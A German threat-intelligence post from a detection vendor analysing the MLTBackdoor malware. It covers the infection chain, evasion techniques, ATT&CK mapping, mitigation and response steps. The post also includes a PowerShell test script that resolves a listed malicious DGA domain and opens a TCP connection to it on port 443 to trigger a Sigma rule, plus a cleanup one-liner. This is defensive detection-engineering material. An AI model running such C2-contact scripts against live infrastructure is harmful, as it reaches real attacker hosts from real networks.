Technische Analyse von MLTBackdoor

SOC Prime Team

Folgen

Detection stack

AIDR
Alert
ETL
Query

Bedrohungsbericht
Angriffsablauf
Erkennungen
Simulationen

Zusammenfassung

Zscaler ThreatLabz identifizierte im Mai 2026 eine neue Malware-Familie, MLTBackdoor. Die Bedrohung wird über eine mehrstufige ClickFix-Infektionskette verbreitet und scheint von Ransomware-Betreibern genutzt zu werden, um anfänglichen Zugriff zu erlangen und laterale Bewegung zu unterstützen. Die Malware verlässt sich auf starke Verschleierung, einen Domain-Generator-Algorithmus und einen Beacon Object File (BOF) Loader, um ihre Fähigkeiten nach der Ausführung zu erweitern. Ihre Netzwerkkommunikation ist über TLS verschlüsselt und soll legitimen Microsoft Delivery Optimization-Datenverkehr nachahmen, was dazu beiträgt, die Aktivitäten in das normale Netzwerkverhalten zu integrieren.

Untersuchung

Die Analyse verfolgte die Infektionskette zurück zu einem conhost.exe -Wrapper, der ein komprimiertes Archiv von einer Domain herunterlud, die durch die DGA-Logik der Malware generiert wurde. Innerhalb dieses Archivs entschlüsselte endpointdlp.dll eine RC4-verschlüsselte Nutzlast, die dann als MLTBackdoor-Binärdatei geladen wurde. Forscher fanden heraus, dass die Malware gemischte Boolesche Arithmetik, Kontrollfluss-Flachung, indirekte Systemaufrufe und ein eigenes verschlüsseltes Kommunikationsprotokoll verwendet, um Analysen und Erkennungen zu erschweren. Der eingebaute BOF-Loader ermöglicht den Betreibern außerdem, zusätzliche Cobalt Strike-ähnliche Module im Speicher auszuführen.

Minderung

Verteidiger sollten die identifizierten Command-and-Control-Domains blockieren und die verwandten DGA-Muster überwachen. Die Erkennung sollte sich auch auf die spezifische User-Agent-Zeichenfolge und den TLS-Verkehr richten, der auf /api/v1/telemetry über Port 443gerichtet ist. Sicherheitsteams sollten auf verdächtige Verwendung von conhost.exe mit den dokumentierten Argumenten achten und auf die Erstellung von entschlüsselte endpointdlp.dll in temporären Verzeichnissen. Verhaltensbasierte Erkennungen für API-Hashing und die Nutzung indirekter Systemaufrufe können die Sichtbarkeit von MLTBackdoor-Aktivitäten weiter verbessern.

Reaktion

Wenn MLTBackdoor-Aktivitäten erkannt werden, isolieren Sie den betroffenen Endpunkt sofort, beenden Sie den bösartigen Prozess und entfernen Sie alle Dateien, die vom Temp -Verzeichnis durch den initialen Loader abgelegt wurden. Ermittler sollten dann eine forensische Überprüfung auf zusätzliche BOF-Module oder Folgelasten durchführen. Alle potenziell kompromittierten Anmeldeinformationen sollten zurückgesetzt werden, und die Bedrohungsjagd sollte erweitert werden, um Versuche einer lateralen Bewegung mit derselben Taktik zu identifizieren.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes step_a["Technik – T1189 Drive-by Compromise: Der Gegner hostet bösartige Inhalte, die geliefert werden, wenn ein Opfer eine kompromittierte Website besucht. Technik – T1204.001 Benutzer-Interaktion: Bösartiger Link: Das Opfer klickt auf einen gestalteten Link, der die Ausführung der Nutzlast auslöst."] class step_a action step_b["Technik – T1659 Inhaltsinjektion: Bösartiger Code wird in legitime Webseiten injiziert, sodass Besucher die kompromittierten Inhalte erhalten."] class step_b action step_c["Technik – T1553.002 Signierte Proxy-Ausführung (Defender): Verwendung einer signierten Microsoft Defender-Binärdatei zur Proxy-Ausführung. Technik – T1574.001 Hijack Execution Flow: DLL-Suchreihenfolge-Entführung: Lädt bösartigen Code durch Manipulation der DLL-Auflösungsreihenfolge. Technik – T1218 Signierte Proxy-Ausführung: Führt Nutzlast durch vertrauenswürdige signierte Binärdateien aus."] class step_c action step_d["Technik – T1027.007 Verschleierte/Gespeicherte Dateien: Eingebettete Nutzlast: Die Nutzlast wird mit Makro-Binäranalyse (MBA) und komprimiertem Dateiformat (CFF) verschleiert, um der Erkennung zu entgehen."] class step_d action step_e["Technik – T1497.001 Virtualisierungs-/Sandbox-Umgehung: Systemprüfungen: Überprüfungen auf virtualisierte Umgebungen. Technik – T1497.003 Virtualisierungs-/Sandbox-Umgehung: Zeitprüfungen: Verwendet Zeitprüfungen zur Erkennung von Analysen. Technik – T1622 Debugger-Umgehung: Erkennt das Vorhandensein von Debuggern und ändert das Verhalten."] class step_e action step_f["Technik – T1568 Generieren, Verschleiern oder Ändern eines Domainnamens: Generiert zahlreiche Domainnamen für Kommando-und-Kontrolle. Technik – T1104 Webdienst (Fallback-C2): Verwendet einen Webdienst als Fallback-Kommunikationskanal."] class step_f action step_g["Technik – T1090 Proxy: Leitet C2-Verkehr über einen Proxy. Technik – T1205 Verkehrssignalisierung: Codiert Signalisierungsinformationen in legitimen Datenverkehr. Technik – T1001.003 Verschleierter/Verschlüsselter Netzwerkverkehr: Protokoll-Impersonation: Gibt sich als normaler TLS 443-Verkehr mit einem gefälschten Benutzer-Agent aus."] class step_g action step_h["Technik – T1105 Ingression Tool Transfer: Überträgt eine zweite Stufe Nutzlast zum kompromittierten Host über das Netzwerk."] class step_h action step_i["Technik – T1546.006 Ereignisgesteuerte Ausführung: Component Object Model Entführung (BOF-Loader): Lädt und führt Beacon Object Files mit einem Buffer-Overrun (BOF) Loader aus."] class step_i malware %% Connections step_a –>|führt zu| step_b step_b –>|führt zu| step_c step_c –>|führt zu| step_d step_d –>|führt zu| step_e step_e –>|führt zu| step_f step_f –>|führt zu| step_g step_g –>|führt zu| step_h step_h –>|führt zu| step_i "

Angriffsablauf

Angriffs-Narrativ & Befehle:
1. Aufklärung – Klären DGA-Domain – Die Hintertür generiert eine DNS-Abfrage für hrs2y15sungu.com, eine Domain, die durch ihren internen DGA generiert wurde.
2. C2-Kontakt – Öffne einen TCP-Socket – Unter Verwendung von PowerShell stellt der Gegner eine rohe TCP-Verbindung zur aufgelösten IP auf Port 443 (HTTPS) her, um mit normalem Datenverkehr zu verschmelzen.
3. Nutzlastabruf (T1105) – Über denselben Socket würde die Hintertür zusätzliche Module ziehen; für den Test senden wir einfach eine harmlose Zeichenkette.
Diese Schritte lösen einen Sysmon-Ereignis-ID-3-Datensatz mit DestinationHostname = hrs2y15sungu.comaus, was die Auswahl Bedingung der Sigma-Regel erfüllt.

Regression-Testskript:

# TC-20260610-A7B3Z – Simuliere MLTBackdoor-C2-Kommunikation
# -------------------------------------------------------
# 1. Lösen der bösartigen Domain (simulierte DGA-Ausgabe)
$malDomain = "hrs2y15sungu.com"
try {
    $ip = [System.Net.Dns]::GetHostAddresses($malDomain)[0].IPAddressToString
} catch {
    Write-Error "Fehler beim Auflösen von $malDomain – Test wird abgebrochen."
    Exit 1
}

# 2. Öffne eine TCP-Verbindung zur aufgelösten IP auf Port 443
$port = 443
$client = New-Object System.Net.Sockets.TcpClient
$client.Connect($ip, $port)

# 3. Senden einer harmlosen Nutzlast (simuliert Modulabruf)
$stream = $client.GetStream()
$payload = [System.Text.Encoding]::ASCII.GetBytes("TEST_PAYLOAD")
$stream.Write($payload, 0, $payload.Length)

# 4. Halte Verbindung kurz aufrecht, um die Protokollgenerierung zu garantieren
Start-Sleep -Seconds 5

# 5. Aufräumen
$stream.Close()
$client.Close()
Write-Output "Simulation abgeschlossen – Verbindung zu $malDomain ($ip:$port) geschlossen."

Aufräum-Befehle:

# Sicherstellen, dass keine verbliebenen Sockets vorhanden sind (falls das Skript abgebrochen wurde)
Get-NetTCPConnection -RemotePort 443 |
    Where-Object { $_.RemoteAddress -eq (Resolve-DnsName hrs2y15sungu.com).IPAddress } |
    ForEach-Object { Stop-Process -Id $_.OwningProcess -Force }

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten